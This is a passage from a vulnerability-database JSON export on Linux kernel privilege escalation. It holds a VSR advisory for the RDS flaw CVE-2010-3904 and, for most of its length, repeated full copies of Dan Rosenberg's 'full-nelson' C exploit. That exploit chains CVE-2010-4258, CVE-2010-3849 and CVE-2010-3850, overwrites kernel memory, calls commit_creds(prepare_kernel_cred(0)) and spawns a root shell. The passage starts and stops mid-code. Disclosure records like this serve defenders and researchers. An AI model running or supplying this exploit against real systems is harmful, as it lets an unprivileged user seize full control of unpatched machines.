it\r\n deadlocks when trying to unlock various\r\n mutexes after OOPSing */\r\n pipe(fildes);\r\n fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);\r\n fildes[3] = open("/dev/zero", O_RDONLY);\r\n\r\n if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {\r\n printf("[*] Failed to open file descriptors.\n");\r\n return -1;\r\n }\r\n\r\n /* Resolve addresses of relevant symbols */\r\n printf("[*] Resolving kernel addresses...\n");\r\n econet_ioctl = get_kernel_sym("econet_ioctl");\r\n econet_ops = get_kernel_sym("econet_ops");\r\n commit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n\r\n if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {\r\n printf("[*] Failed to resolve kernel symbols.\n");\r\n return -1;\r\n }\r\n\r\n if(!(newstack = malloc(65536))) {\r\n printf("[*] Failed to allocate memory.\n");\r\n return -1;\r\n }\r\n\r\n printf("[*] Calculating target...\n");\r\n target = econet_ops + 10 * sizeof(void *) - OFFSET;\r\n\r\n /* Clear the higher bits */\r\n landing = econet_ioctl << SHIFT >> SHIFT;\r\n\r\n payload = mmap((void *)(landing & ~0xfff), 2 * 4096,\r\n PROT_READ | PROT_WRITE | PROT_EXEC,\r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);\r\n\r\n if ((long)payload == -1) {\r\n printf("[*] Failed to mmap() at target address.\n");\r\n return -1;\r\n }\r\n\r\n memcpy((void *)landing, &trampoline, 1024);\r\n\r\n clone((int (*)(void *))trigger,\r\n (void *)((unsigned long)newstack + 65536),\r\n CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,\r\n &fildes, NULL, NULL, target);\r\n\r\n sleep(1);\r\n\r\n printf("[*] Triggering payload...\n");\r\n ioctl(fildes[2], 0, NULL);\r\n\r\n if(getuid()) {\r\n printf("[*] Exploit failed to get root.\n");\r\n return -1;\r\n }\r\n\r\n printf("[*] Got root!\n");\r\n execl("/bin/sh", "/bin/sh", NULL);\r\n}\r\n", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "securityvulns", "title": "Linux kernel exploit", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3850", "CVE-2010-4258", "CVE-2010-3849"], "modified": "2010-12-09T00:00:00", "id": "SECURITYVULNS:DOC:25260", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25260", "sourceData": "", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:27", "description": "Insufficient registry access validation on 32-bit syscalls emulation.", "cvss3": {}, "published": "2007-09-25T00:00:00", "type": "securityvulns", "title": "64-bit Linux kernel privilege escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2007-4573"], "modified": "2007-09-25T00:00:00", "id": "SECURITYVULNS:VULN:8184", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8184", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:39", "description": "It's possible to overwite kernel memory regions via recvmsg() for RDS protocol.", "cvss3": {}, "published": "2010-10-24T00:00:00", "type": "securityvulns", "title": "Linux kernel RDS protocol privilege escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-24T00:00:00", "id": "SECURITYVULNS:VULN:11211", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11211", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n VSR Security Advisory\r\n http://www.vsecurity.com/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nAdvisory Name: Linux RDS Protocol Local Privilege Escalation\r\n Release Date: 2010-10-19\r\n Application: Linux Kernel\r\n Versions: 2.6.30 - 2.6.36-rc8\r\n Severity: High\r\n Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com >\r\nVendor Status: Patch Released [3]\r\nCVE Candidate: CVE-2010-3904\r\n Reference: http://www.vsecurity.com/resources/advisory/20101019-1/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n\r\nProduct Description\r\n- -------------------\r\n- From [1]:\r\n\r\n "Linux is a free Unix-type operating system originally created by Linus\r\n Torvalds with the assistance of developers around the world. Developed under\r\n the GNU General Public License, the source code for Linux is freely available\r\n to everyone."\r\n\r\n- From [2]:\r\n\r\n "Reliable Datagram Sockets (RDS) provide in order, non-duplicating, \r\n highly available, low overhead, reliable delivery of datagrams between \r\n hundreds of thousands of non-connected endpoints."\r\n\r\nVulnerability Overview\r\n- ----------------------\r\nOn October 13th, VSR identified a vulnerability in the RDS protocol, as\r\nimplemented in the Linux kernel. Because kernel functions responsible for\r\ncopying data between kernel and user space failed to verify that a\r\nuser-provided address actually resided in the user segment, a local attacker\r\ncould issue specially crafted socket function calls to write abritrary values\r\ninto kernel memory. By leveraging this capability, it is possible for\r\nunprivileged users to escalate privileges to root.\r\n\r\nVulnerability Details\r\n- ---------------------\r\nOn Linux, recvmsg() style socket calls are performed using iovec structs, which\r\nallow a user to specify a base address and size for a buffer used to receive\r\nsocket data. Each packet family is responsible for defining functions that\r\ncopy socket data, which is received by the kernel, back to user space to allow\r\nuser programs to process and handle received network data.\r\n\r\nWhen performing this copying of data to user space, the RDS protocol failed to\r\nverify that the base address of a user-provided iovec struct pointed to a valid\r\nuserspace address before using the __copy_to_user_inatomic() function to copy\r\nthe data. As a result, by providing a kernel address as an iovec base and\r\nissuing a recvmsg() style socket call, a local user could write arbitrary data\r\ninto kernel memory. This can be leveraged to escalate privileges to root.\r\n\r\nProof-of-Concept Exploit\r\n- ------------------------\r\nVSR has developed a proof-of-concept exploit [4] to both demonstrate the\r\nseverity of this issue as well as allow users and administrators to verify the\r\nexistence of the vulnerability. The exploit leverages the ability to write\r\ninto kernel memory to reset the kernel's security operations structure and gain\r\nroot privileges. The exploit requires that kernel symbol resolution is\r\navailable to unprivileged users, via /proc/kallsyms or similar, as is the case\r\non most stock distributions. It has been tested on both 32-bit and 64-bit x86\r\nplatforms. While this exploit has been reliable during testing, it is not\r\nadvised to run kernel exploits on production systems, as there is a risk of\r\ncausing system instability and crashing the affected machine.\r\n\r\nVersions Affected\r\n- -----------------\r\nThis vulnerability affects unpatched versions of the Linux kernel, starting\r\nfrom 2.6.30, where the RDS protocol was first included. Installations are only\r\nvulnerable if the CONFIG_RDS kernel configuration option is set, and if there\r\nare no restrictions on unprivileged users loading packet family modules, as is\r\nthe case on most stock distributions.\r\n\r\nVendor Response\r\n- ---------------\r\nThe following timeline details Linux's response to the reported issue.\r\n\r\n2010-10-13 Vulnerability reported to Linux security team\r\n2010-10-13 Response, agreement on disclosure date\r\n2010-10-19 Fix publicly committed [3]\r\n2010-10-19 Coordinated disclosure\r\n\r\nRecommendation\r\n- --------------\r\nUsers should either install updates provided by downstream distributions, or\r\napply the committed patch [3] and recompile their kernel.\r\n\r\nCommon Vulnerabilities and Exposures (CVE) Information\r\n- ------------------------------------------------------\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe number CVE-2010-3904 to this issue. This is a candidates for\r\ninclusion in the CVE list (http://cve.mitre.org), which standardizes\r\nnames for security problems.\r\n\r\nAcknowledgements\r\n- ----------------\r\nThanks to Andrew Morton, Linus Torvalds, Andy Grover, and Eugene Teo for their\r\nprompt responses and patch.\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nReferences:\r\n\r\n1. Linux kernel \r\n http://www.linux.org\r\n\r\n2. Reliable Datagram Sockets\r\n http://oss.oracle.com/pipermail/rds-devel/2007-November/000228.html\r\n\r\n3. GIT patch \r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f\r\n\r\n4. RDS protocol privilege escalation exploit\r\n http://www.vsecurity.com/download/tools/linux-rds-exploit.c\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nThis advisory is distributed for educational purposes only with the sincere\r\nhope that it will help promote public safety. This advisory comes with\r\nabsolutely NO WARRANTY; not even the implied warranty of merchantability or\r\nfitness for a particular purpose. Virtual Security Research, LLC nor the author\r\naccepts any liability for any direct, indirect, or consequential loss or damage\r\narising from use of, or reliance on, this information.\r\n\r\nSee the VSR disclosure policy for more information on our responsible\r\ndisclosure practices: http://www.vsecurity.com/company/disclosure\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n Copyright 2010 Virtual Security Research, LLC. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAky93O8ACgkQQ1RSUNR+T+gXiwCgkVifvjPHDD+Xf6JrQJ4NisSW\r\nUKEAn0Rh+XhN3kGUne5sCAGFeGln+qM0\r\n=cKv/\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2010-10-24T00:00:00", "type": "securityvulns", "title": "VSR Advisories: Linux RDS Protocol Local Privilege Escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-24T00:00:00", "id": "SECURITYVULNS:DOC:24978", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24978", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:33", "description": "proto_ops structure uninitialized pointers.", "cvss3": {}, "published": "2009-08-31T00:00:00", "type": "securityvulns", "title": "Linux kernel uninitialized pointers", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2009-08-31T00:00:00", "id": "SECURITYVULNS:VULN:10150", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10150", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:07:08", "description": "No description provided by source.", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "seebug", "title": "Linux Kernel <= 2.6.37 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3849", "CVE-2010-3850", "CVE-2010-4258"], "modified": "2010-12-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20280", "id": "SSV:20280", "sourceData": "\n /*\r\n * Linux Kernel <= 2.6.37 local privilege escalation\r\n * by Dan Rosenberg\r\n * @djrbliss on twitter\r\n *\r\n * Usage:\r\n * gcc full-nelson.c -o full-nelson\r\n * ./full-nelson\r\n *\r\n * This exploit leverages three vulnerabilities to get root, all of which were\r\n * discovered by Nelson Elhage:\r\n *\r\n * CVE-2010-4258\r\n * -------------\r\n * This is the interesting one, and the reason I wrote this exploit. If a\r\n * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL\r\n * word will be written to a user-specified pointer when that thread exits.\r\n * This write is done using put_user(), which ensures the provided destination\r\n * resides in valid userspace by invoking access_ok(). However, Nelson\r\n * discovered that when the kernel performs an address limit override via\r\n * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,\r\n * etc.), this override is not reverted before calling put_user() in the exit\r\n * path, allowing a user to write a NULL word to an arbitrary kernel address.\r\n * Note that this issue requires an additional vulnerability to trigger.\r\n *\r\n * CVE-2010-3849\r\n * -------------\r\n * This is a NULL pointer dereference in the Econet protocol. By itself, it's\r\n * fairly benign as a local denial-of-service. It's a perfect candidate to\r\n * trigger the above issue, since it's reachable via sock_no_sendpage(), which\r\n * subsequently calls sendmsg under KERNEL_DS.\r\n *\r\n * CVE-2010-3850\r\n * -------------\r\n * I wouldn't be able to reach the NULL pointer dereference and trigger the\r\n * OOPS if users weren't able to assign Econet addresses to arbitrary\r\n * interfaces due to a missing capabilities check.\r\n *\r\n * In the interest of public safety, this exploit was specifically designed to\r\n * be limited:\r\n *\r\n * * The particular symbols I resolve are not exported on Slackware or Debian\r\n * * Red Hat does not support Econet by default\r\n * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and\r\n * Debian\r\n *\r\n * However, the important issue, CVE-2010-4258, affects everyone, and it would\r\n * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly\r\n * more sophisticated version of this that doesn't have the roadblocks I put in\r\n * to prevent abuse by script kiddies.\r\n *\r\n * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.\r\n *\r\n * NOTE: the exploit process will deadlock and stay in a zombie state after you\r\n * exit your root shell because the Econet thread OOPSes while holding the\r\n * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.\r\n *\r\n * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla\r\n */\r\n \r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <fcntl.h>\r\n#include <sys/ioctl.h>\r\n#include <string.h>\r\n#include <net/if.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <sys/utsname.h>\r\n#include <sys/mman.h>\r\n#include <unistd.h>\r\n \r\n/* How many bytes should we clear in our\r\n * function pointer to put it into userspace? */\r\n#ifdef __x86_64__\r\n#define SHIFT 24\r\n#define OFFSET 3\r\n#else\r\n#define SHIFT 8\r\n#define OFFSET 1\r\n#endif\r\n \r\n/* thanks spender... */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n \r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n \r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, " [+] Resolved %s to %p%s\\n", name, (void *)addr, rep ? " (via System.map)" :\r\n"");\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n \r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\nstatic int __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n \r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n \r\n}\r\n \r\n/* Why do I do this? Because on x86-64, the address of\r\n * commit_creds and prepare_kernel_cred are loaded relative\r\n * to rip, which means I can't just copy the above payload\r\n * into my landing area. */\r\nvoid __attribute__((regparm(3)))\r\ntrampoline()\r\n{\r\n \r\n#ifdef __x86_64__\r\n asm("mov $getroot, %rax; call *%rax;");\r\n#else\r\n asm("mov $getroot, %eax; call *%eax;");\r\n#endif\r\n \r\n}\r\n \r\n/* Triggers a NULL pointer dereference in econet_sendmsg\r\n * via sock_no_sendpage, so it's under KERNEL_DS */\r\nint trigger(int * fildes)\r\n{\r\n int ret;\r\n struct ifreq ifr;\r\n \r\n memset(&ifr, 0, sizeof(ifr));\r\n strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);\r\n \r\n ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);\r\n \r\n if(ret < 0) {\r\n printf("[*] Failed to set Econet address.\\n");\r\n return -1;\r\n }\r\n \r\n splice(fildes[3], NULL, fildes[1], NULL, 128, 0);\r\n splice(fildes[0], NULL, fildes[2], NULL, 128, 0);\r\n \r\n /* Shouldn't get here... */\r\n exit(0);\r\n}\r\n \r\nint main(int argc, char * argv[])\r\n{\r\n unsigned long econet_ops, econet_ioctl, target, landing;\r\n int fildes[4], pid;\r\n void * newstack, * payload;\r\n \r\n /* Create file descriptors now so there are two\r\n references to them after cloning...otherwise\r\n the child will never return because it\r\n deadlocks when trying to unlock various\r\n mutexes after OOPSing */\r\n pipe(fildes);\r\n fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);\r\n fildes[3] = open("/dev/zero", O_RDONLY);\r\n \r\n if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {\r\n printf("[*] Failed to open file descriptors.\\n");\r\n return -1;\r\n }\r\n \r\n /* Resolve addresses of relevant symbols */\r\n printf("[*] Resolving kernel addresses...\\n");\r\n econet_ioctl = get_kernel_sym("econet_ioctl");\r\n econet_ops = get_kernel_sym("econet_ops");\r\n commit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n \r\n if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {\r\n printf("[*] Failed to resolve kernel symbols.\\n");\r\n return -1;\r\n }\r\n \r\n if(!(newstack = malloc(65536))) {\r\n printf("[*] Failed to allocate memory.\\n");\r\n return -1;\r\n }\r\n \r\n printf("[*] Calculating target...\\n");\r\n target = econet_ops + 10 * sizeof(void *) - OFFSET;\r\n \r\n /* Clear the higher bits */\r\n landing = econet_ioctl << SHIFT >> SHIFT;\r\n \r\n payload = mmap((void *)(landing & ~0xfff), 2 * 4096,\r\n PROT_READ | PROT_WRITE | PROT_EXEC,\r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);\r\n \r\n if ((long)payload == -1) {\r\n printf("[*] Failed to mmap() at target address.\\n");\r\n return -1;\r\n }\r\n \r\n memcpy((void *)landing, &trampoline, 1024);\r\n \r\n clone((int (*)(void *))trigger,\r\n (void *)((unsigned long)newstack + 65536),\r\n CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,\r\n &fildes, NULL, NULL, target);\r\n \r\n sleep(1);\r\n \r\n printf("[*] Triggering payload...\\n");\r\n ioctl(fildes[2], 0, NULL);\r\n \r\n if(getuid()) {\r\n printf("[*] Exploit failed to get root.\\n");\r\n return -1;\r\n }\r\n \r\n printf("[*] Got root!\\n");\r\n execl("/bin/sh", "/bin/sh", NULL);\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20280", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T16:53:37", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel <= 2.6.37 - Local Privilege Escalation", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3849", "CVE-2010-3850", "CVE-2010-4258"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70365", "id": "SSV:70365", "sourceData": "\n /*\r\n * Linux Kernel <= 2.6.37 local privilege escalation\r\n * by Dan Rosenberg\r\n * @djrbliss on twitter\r\n *\r\n * Usage:\r\n * gcc full-nelson.c -o full-nelson\r\n * ./full-nelson\r\n *\r\n * This exploit leverages three vulnerabilities to get root, all of which were\r\n * discovered by Nelson Elhage:\r\n *\r\n * CVE-2010-4258\r\n * -------------\r\n * This is the interesting one, and the reason I wrote this exploit. If a\r\n * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL\r\n * word will be written to a user-specified pointer when that thread exits.\r\n * This write is done using put_user(), which ensures the provided destination\r\n * resides in valid userspace by invoking access_ok(). However, Nelson\r\n * discovered that when the kernel performs an address limit override via\r\n * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,\r\n * etc.), this override is not reverted before calling put_user() in the exit\r\n * path, allowing a user to write a NULL word to an arbitrary kernel address.\r\n * Note that this issue requires an additional vulnerability to trigger.\r\n *\r\n * CVE-2010-3849\r\n * -------------\r\n * This is a NULL pointer dereference in the Econet protocol. By itself, it's\r\n * fairly benign as a local denial-of-service. It's a perfect candidate to\r\n * trigger the above issue, since it's reachable via sock_no_sendpage(), which\r\n * subsequently calls sendmsg under KERNEL_DS.\r\n *\r\n * CVE-2010-3850\r\n * -------------\r\n * I wouldn't be able to reach the NULL pointer dereference and trigger the\r\n * OOPS if users weren't able to assign Econet addresses to arbitrary\r\n * interfaces due to a missing capabilities check.\r\n *\r\n * In the interest of public safety, this exploit was specifically designed to\r\n * be limited:\r\n *\r\n * * The particular symbols I resolve are not exported on Slackware or Debian\r\n * * Red Hat does not support Econet by default\r\n * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and\r\n * Debian\r\n *\r\n * However, the important issue, CVE-2010-4258, affects everyone, and it would\r\n * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly\r\n * more sophisticated version of this that doesn't have the roadblocks I put in\r\n * to prevent abuse by script kiddies.\r\n *\r\n * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.\r\n *\r\n * NOTE: the exploit process will deadlock and stay in a zombie state after you\r\n * exit your root shell because the Econet thread OOPSes while holding the\r\n * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.\r\n *\r\n * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <fcntl.h>\r\n#include <sys/ioctl.h>\r\n#include <string.h>\r\n#include <net/if.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <sys/utsname.h>\r\n#include <sys/mman.h>\r\n#include <unistd.h>\r\n\r\n/* How many bytes should we clear in our\r\n * function pointer to put it into userspace? */\r\n#ifdef __x86_64__\r\n#define SHIFT 24\r\n#define OFFSET 3\r\n#else\r\n#define SHIFT 8\r\n#define OFFSET 1\r\n#endif\r\n\r\n/* thanks spender... */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n\r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n\r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, " [+] Resolved %s to %p%s\\n", name, (void *)addr, rep ? " (via System.map)" : \r\n"");\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\nstatic int __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n\r\n}\r\n\r\n/* Why do I do this? Because on x86-64, the address of\r\n * commit_creds and prepare_kernel_cred are loaded relative\r\n * to rip, which means I can't just copy the above payload\r\n * into my landing area. */\r\nvoid __attribute__((regparm(3)))\r\ntrampoline()\r\n{\r\n\r\n#ifdef __x86_64__\r\n asm("mov $getroot, %rax; call *%rax;");\r\n#else\r\n asm("mov $getroot, %eax; call *%eax;");\r\n#endif\r\n\r\n}\r\n\r\n/* Triggers a NULL pointer dereference in econet_sendmsg\r\n * via sock_no_sendpage, so it's under KERNEL_DS */\r\nint trigger(int * fildes)\r\n{\r\n int ret;\r\n struct ifreq ifr;\r\n\r\n memset(&ifr, 0, sizeof(ifr));\r\n strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);\r\n\r\n ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);\r\n\r\n if(ret < 0) {\r\n printf("[*] Failed to set Econet address.\\n");\r\n return -1;\r\n }\r\n\r\n splice(fildes[3], NULL, fildes[1], NULL, 128, 0);\r\n splice(fildes[0], NULL, fildes[2], NULL, 128, 0);\r\n\r\n /* Shouldn't get here... */\r\n exit(0);\r\n}\r\n\r\nint main(int argc, char * argv[])\r\n{\r\n unsigned long econet_ops, econet_ioctl, target, landing;\r\n int fildes[4], pid;\r\n void * newstack, * payload;\r\n\r\n /* Create file descriptors now so there are two\r\n references to them after cloning...otherwise\r\n the child will never return because it\r\n deadlocks when trying to unlock various\r\n mutexes after OOPSing */\r\n pipe(fildes);\r\n fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);\r\n fildes[3] = open("/dev/zero", O_RDONLY);\r\n\r\n if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {\r\n printf("[*] Failed to open file descriptors.\\n");\r\n return -1;\r\n }\r\n\r\n /* Resolve addresses of relevant symbols */\r\n printf("[*] Resolving kernel addresses...\\n");\r\n econet_ioctl = get_kernel_sym("econet_ioctl");\r\n econet_ops = get_kernel_sym("econet_ops");\r\n commit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n\r\n if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {\r\n printf("[*] Failed to resolve kernel symbols.\\n");\r\n return -1;\r\n }\r\n\r\n if(!(newstack = malloc(65536))) {\r\n printf("[*] Failed to allocate memory.\\n");\r\n return -1;\r\n }\r\n\r\n printf("[*] Calculating target...\\n");\r\n target = econet_ops + 10 * sizeof(void *) - OFFSET;\r\n\r\n /* Clear the higher bits */\r\n landing = econet_ioctl << SHIFT >> SHIFT;\r\n\r\n payload = mmap((void *)(landing & ~0xfff), 2 * 4096,\r\n PROT_READ | PROT_WRITE | PROT_EXEC,\r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);\r\n\r\n if ((long)payload == -1) {\r\n printf("[*] Failed to mmap() at target address.\\n");\r\n return -1;\r\n }\r\n\r\n memcpy((void *)landing, &trampoline, 1024);\r\n\r\n clone((int (*)(void *))trigger,\r\n (void *)((unsigned long)newstack + 65536),\r\n CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,\r\n &fildes, NULL, NULL, target);\r\n\r\n sleep(1);\r\n\r\n printf("[*] Triggering payload...\\n");\r\n ioctl(fildes[2], 0, NULL);\r\n\r\n if(getuid()) {\r\n printf("[*] Exploit failed to get root.\\n");\r\n return -1;\r\n }\r\n\r\n printf("[*] Got root!\\n");\r\n execl("/bin/sh", "/bin/sh", 